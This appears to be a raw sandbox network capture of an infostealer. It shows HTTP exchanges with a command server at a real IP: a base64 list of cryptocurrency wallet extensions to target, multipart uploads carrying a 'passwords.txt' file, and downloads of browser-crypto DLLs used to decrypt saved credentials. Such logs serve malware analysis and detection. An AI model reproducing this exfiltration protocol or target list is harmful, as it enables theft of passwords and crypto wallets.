                                                      Data Ascii: sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfDF8MHwwfENvaW5odWJ8MXxqZ2FhaW1hamlwYnBkb2dwZGdsaGFwaGxkYWtpa2dlZnwxfDB8MHxMZWFwIENvc21vcy
                                                      Aug 29, 2024 22:52:18.883192062 CEST128INData Raw: 78 66 44 42 38 4d 48 78 51 64 57 78 7a 5a 53 42 58 59 57 78 73 5a 58 51 67 51 32 68 79 62 32 31 70 64 57 31 38 4d 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a
                                                      Data Ascii: xfDB8MHxQdWxzZSBXYWxsZXQgQ2hyb21pdW18MXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHwxfG1rcGVnamt
                                                      Aug 29, 2024 22:52:18.965337038 CEST648INData Raw: 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 57 4e 72 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6d 62 47 74 74 5a 6d 68 6c 59 6d 56 6b 59
                                                      Data Ascii: ibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm
                                                      Aug 29, 2024 22:52:18.966561079 CEST512OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHD
                                                      Host: 147.45.68.138
                                                      Content-Length: 332
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a
                                                      Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="mode"21------ECAKKKKJDBKKFIEBKEHD--
                                                      Aug 29, 2024 22:52:19.513262033 CEST282INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180
                                                      Aug 29, 2024 22:52:19.996917009 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFH
                                                      Host: 147.45.68.138
                                                      Content-Length: 6325
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:19.996962070 CEST6325OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32
                                                      Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------IDHJEBGIEBFIJK
                                                      Aug 29, 2024 22:52:20.679841995 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:20.681724072 CEST95OUTGET /sql.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:20.867394924 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:20 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 2459136
                                                      Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
                                                      Connection: keep-alive
                                                      ETag: "6560a86a-258600"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZYPELi`e!% {D %@#6$($$`#8x#@$.textG `.rdata" $ @@.data4| $b#@.idata$^$@@.00cfg$p$@@.rsrc$r$@@.reloc5$$@B
                                                      Aug 29, 2024 22:52:20.867412090 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc e9 8b 17 1c 00 e9 a0 11 1d 00 e9 bf ab 1b 00 e9 a2 44 1c 00 e9 3b 27 1d 00 e9 cc 5a 1d 00 e9 95 a9 1c 00 e9
                                                      Data Ascii: D;'ZRxs\tNg4^0Gb&OlpjBT%{rf:%oR}r
                                                      Aug 29, 2024 22:52:22.860272884 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                                                      Host: 147.45.68.138
                                                      Content-Length: 4677
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:23.632558107 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:23.764925957 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBF
                                                      Host: 147.45.68.138
                                                      Content-Length: 1529
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:24.489255905 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:24.505171061 CEST617OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ
                                                      Host: 147.45.68.138
                                                      Content-Length: 437
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b [TRUNCATED]
                                                      Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_data"------BGIJJKKJJDAAAAAKFHJJ--
                                                      Aug 29, 2024 22:52:25.225014925 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:25.685971975 CEST617OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
                                                      Host: 147.45.68.138
                                                      Content-Length: 437
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 [TRUNCATED]
                                                      Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_data"------GHJKJDAKEHJDGDGDGHID--
                                                      Aug 29, 2024 22:52:26.396720886 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:26 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:26.428225994 CEST99OUTGET /freebl3.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:26.613811016 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:26 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 685392
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-a7550"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                      Aug 29, 2024 22:52:27.082385063 CEST99OUTGET /mozglue.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:27.268141985 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:27 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 608080
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-94750"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                      Aug 29, 2024 22:52:27.636847019 CEST100OUTGET /msvcp140.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:27.822411060 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:27 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 450024
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-6dde8"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                      Aug 29, 2024 22:52:28.242443085 CEST100OUTGET /softokn3.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:28.428190947 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:28 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 257872
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-3ef50"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                      Aug 29, 2024 22:52:28.546225071 CEST104OUTGET /vcruntime140.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:28.731949091 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:28 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 80880
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-13bf0"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                      Aug 29, 2024 22:52:28.743488073 CEST96OUTGET /nss3.dll HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:28.968014956 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:28 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 2046288
                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                      Connection: keep-alive
                                                      ETag: "6315a9f4-1f3950"
                                                      Accept-Ranges: bytes
